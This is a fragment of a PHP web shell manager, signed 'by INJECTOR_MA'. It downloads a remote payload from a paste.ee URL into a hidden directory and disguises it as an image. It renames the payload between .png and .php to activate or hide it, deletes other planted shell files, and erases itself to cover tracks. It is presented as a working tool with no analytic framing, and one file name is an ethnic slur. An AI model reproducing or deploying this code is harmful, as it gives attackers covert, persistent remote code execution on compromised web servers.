V 1.0.1
'; ///////////////////////////////////////////////////////////////// if(isset($_POST['get'])){ switch($_POST['tools']){ ////////////////////////////////////////////// case "-----> commit sudoku": unlink(__FILE__); break; ////////////////////////////////////////////// case "--> unlock": echo unlock(); break; ////////////////////////////////////////////// case "---> lock": echo lock(); break; ////////////////////////////////////////////// case "->main": echo kek('https://paste.ee/r/2jNAv/0','old.png'); break; ////////////////////////////////////////////// case "------> remove shell dir": $dir = './-/'; foreach(glob($dir.'*.*') as $v){ unlink($v); } break; ////////////////////////////////////////////// case "-------> remove shells in dir": unlink("pajeet.php"); unlink("tuwu.php"); unlink("vuwu.php"); unlink("wuwu.php"); unlink("buwu.php"); break; ////////////////////////////////////////////// } // switch end }// end if //////////////////////////////////////////////////////////////// // by INJECTOR_MA function kek($input,$output){ @mkdir('-'); @chdir('./-'); if(!file_exists($output)){ $cn = @file_get_contents($input); $save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save); return "
[#]DoNe: Go to Here "; }else{ return "
Go to Here "; } } function unlock(){ rename("./-/old.png", "./-/old.php"); } function lock(){ rename("./-/old.php", "./-/old.png"); } class DeleteOnExit { function __destruct() { unlink(__FILE__); } } ?>